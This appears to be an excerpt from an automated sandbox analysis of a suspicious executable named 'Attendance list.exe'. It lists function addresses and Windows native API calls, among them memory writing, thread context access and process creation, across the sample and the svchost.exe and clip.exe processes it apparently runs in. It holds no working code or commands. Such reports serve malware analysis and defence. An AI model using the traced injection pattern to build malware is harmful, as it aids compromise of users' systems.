            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682AD0 NtReadFile,LdrInitializeThunk,4_2_04682AD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682B60 NtClose,LdrInitializeThunk,4_2_04682B60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04682BE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04682BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04682BA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046835C0 NtCreateMutant,LdrInitializeThunk,4_2_046835C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046839B0 NtGetContextThread,LdrInitializeThunk,4_2_046839B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682C00 NtQueryInformationProcess,4_2_04682C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682CF0 NtOpenProcess,4_2_04682CF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682CC0 NtQueryVirtualMemory,4_2_04682CC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682D00 NtSetInformationFile,4_2_04682D00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682DB0 NtEnumerateKey,4_2_04682DB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682E30 NtWriteVirtualMemory,4_2_04682E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682EA0 NtAdjustPrivilegesToken,4_2_04682EA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682F60 NtCreateProcessEx,4_2_04682F60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682FA0 NtQuerySection,4_2_04682FA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682F90 NtProtectVirtualMemory,4_2_04682F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682AB0 NtWaitForSingleObject,4_2_04682AB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04682B80 NtQueryInformationFile,4_2_04682B80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04683010 NtOpenDirectoryObject,4_2_04683010
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04683090 NtSetValueKey,4_2_04683090
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04683D70 NtOpenThread,4_2_04683D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04683D10 NtOpenProcessToken,4_2_04683D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667B40 NtCreateFile,4_2_02667B40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667E30 NtClose,4_2_02667E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667F90 NtAllocateVirtualMemory,4_2_02667F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667CA0 NtReadFile,4_2_02667CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02667D90 NtDeleteFile,4_2_02667D90
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009240B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_009240B1
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00918858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00918858
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0092545F
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008CE8000_2_008CE800
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008EDBB50_2_008EDBB5
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0094804A0_2_0094804A
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008CE0600_2_008CE060
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008D41400_2_008D4140
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E24050_2_008E2405
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F65220_2_008F6522
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F267E0_2_008F267E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009406650_2_00940665
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E283A0_2_008E283A
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008D68430_2_008D6843
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F89DF0_2_008F89DF
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F6A940_2_008F6A94
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00940AE20_2_00940AE2
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008D8A0E0_2_008D8A0E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00928B130_2_00928B13
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0091EB070_2_0091EB07
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008ECD610_2_008ECD61
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F70060_2_008F7006
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008D31900_2_008D3190
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008D710E0_2_008D710E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C12870_2_008C1287
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E33C70_2_008E33C7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008EF4190_2_008EF419
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008D56800_2_008D5680
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E16C40_2_008E16C4
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008D58C00_2_008D58C0
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E78D30_2_008E78D3
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E1BB80_2_008E1BB8
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008F9D050_2_008F9D05
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008CFE400_2_008CFE40
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E1FD00_2_008E1FD0
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008EBFE60_2_008EBFE6
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00E835E00_2_00E835E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011C02_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021A52_2_004021A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004021B02_2_004021B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FACB2_2_0040FACB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FAD32_2_0040FAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023202_2_00402320
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023BC2_2_004023BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D4432_2_0042D443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004164332_2_00416433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FCF32_2_0040FCF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DD732_2_0040DD73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F502_2_00402F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FA3522_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E3F02_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037003E62_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E02742_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C02C02_2_036C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C81582_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036301002_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA1182_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81CC2_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F41A22_2_036F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037001AA2_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D20002_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036407702_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036647502_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C02_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C6E02_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036405352_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037005912_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F24462_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E44202_2_036E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EE4F62_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB402_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F6BD72_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363EA802_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036569622_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036429A02_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370A9A62_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364A8402_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036428402_2_03642840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E8F02_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036268B82_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4F402_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03682F282_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660F302_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E2F302_2_036E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364CFE02_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632FC82_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BEFA02_2_036BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640E592_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEE262_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FEEDB2_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652E902_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FCE932_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364AD002_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DCD1F2_2_036DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363ADE02_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03658DBF2_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640C002_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630CF22_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0CB52_2_036E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D34C2_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F132D2_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368739A2_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E12ED2_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B2C02_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036452A02_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367516C2_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F1722_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B16B2_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B1B02_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F70E92_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF0E02_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF0CC2_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036470C02_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF7B02_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036856302_2_03685630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F16CC2_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F75712_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037095C32_2_037095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DD5B02_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036314602_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FF43F2_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFB762_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B5BF02_2_036B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367DBF92_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FB802_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B3A6C2_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFA492_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7A462_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EDAC62_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DDAAC2_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03685AA02_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E1AA32_2_036E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036499502_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B9502_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D59102_2_036D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AD8002_2_036AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036438E02_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFF092_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD22_2_03603FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03603FD52_2_03603FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFFB12_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03641F922_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03649EB02_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F7D732_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03643D402_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F1D5A2_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365FDC02_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B9C322_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FFCF22_2_036FFCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047024464_2_04702446
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F44204_2_046F4420
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046FE4F64_2_046FE4F6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046505354_2_04650535
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047105914_2_04710591
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466C6E04_2_0466C6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046507704_2_04650770
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046747504_2_04674750
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0464C7C04_2_0464C7C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046E20004_2_046E2000
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046D81584_2_046D8158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046401004_2_04640100
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046EA1184_2_046EA118
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047081CC4_2_047081CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047041A24_2_047041A2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047101AA4_2_047101AA
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F02744_2_046F0274
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046D02C04_2_046D02C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470A3524_2_0470A352
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465E3F04_2_0465E3F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047103E64_2_047103E6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04650C004_2_04650C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04640CF24_2_04640CF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F0CB54_2_046F0CB5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465AD004_2_0465AD00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046ECD1F4_2_046ECD1F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0464ADE04_2_0464ADE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04668DBF4_2_04668DBF
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04650E594_2_04650E59
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470EE264_2_0470EE26
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470EEDB4_2_0470EEDB
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470CE934_2_0470CE93
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04662E904_2_04662E90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046C4F404_2_046C4F40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04692F284_2_04692F28
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04670F304_2_04670F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F2F304_2_046F2F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465CFE04_2_0465CFE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04642FC84_2_04642FC8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046CEFA04_2_046CEFA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046528404_2_04652840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465A8404_2_0465A840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0467E8F04_2_0467E8F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046368B84_2_046368B8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046669624_2_04666962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046529A04_2_046529A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0471A9A64_2_0471A9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0464EA804_2_0464EA80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470AB404_2_0470AB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04706BD74_2_04706BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046414604_2_04641460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470F43F4_2_0470F43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047075714_2_04707571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047195C34_2_047195C3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046ED5B04_2_046ED5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046956304_2_04695630
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047016CC4_2_047016CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470F7B04_2_0470F7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470F0E04_2_0470F0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_047070E94_2_047070E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046FF0CC4_2_046FF0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046570C04_2_046570C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0468516C4_2_0468516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0463F1724_2_0463F172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0471B16B4_2_0471B16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0465B1B04_2_0465B1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F12ED4_2_046F12ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466B2C04_2_0466B2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046552A04_2_046552A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0463D34C4_2_0463D34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470132D4_2_0470132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0469739A4_2_0469739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046C9C324_2_046C9C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FCF24_2_0470FCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04707D734_2_04707D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04653D404_2_04653D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04701D5A4_2_04701D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466FDC04_2_0466FDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04659EB04_2_04659EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04657F0D4_2_04657F0D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FF094_2_0470FF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04613FD24_2_04613FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04613FD54_2_04613FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FFB14_2_0470FFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04651F924_2_04651F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046BD8004_2_046BD800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046538E04_2_046538E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046599504_2_04659950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466B9504_2_0466B950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046E59104_2_046E5910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046C3A6C4_2_046C3A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04707A464_2_04707A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FA494_2_0470FA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046FDAC64_2_046FDAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046EDAAC4_2_046EDAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_04695AA04_2_04695AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046F1AA34_2_046F1AA3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0470FB764_2_0470FB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0468DBF94_2_0468DBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046C5BF04_2_046C5BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0466FB804_2_0466FB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_026517204_2_02651720
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0266A2804_2_0266A280
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264CB304_2_0264CB30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264ABB04_2_0264ABB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264C9084_2_0264C908
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264C9104_2_0264C910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_026532704_2_02653270
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DA43A4_2_043DA43A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DC0FC4_2_043DC0FC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DB1684_2_043DB168
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DBC444_2_043DBC44
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_043DBD644_2_043DBD64
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04697E54 appears 111 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 046BEA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 0463B970 appears 280 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 046CF290 appears 105 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04685130 appears 58 times
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: String function: 008E0D27 appears 70 times
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: String function: 008E8B40 appears 42 times
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: String function: 008C7F41 appears 35 times
            Source: Attendance list.exe, 00000000.00000003.1994770968.00000000038ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Attendance list.exe
            Source: Attendance list.exe, 00000000.00000003.1993893963.0000000003743000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Attendance list.exe
            Source: Attendance list.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
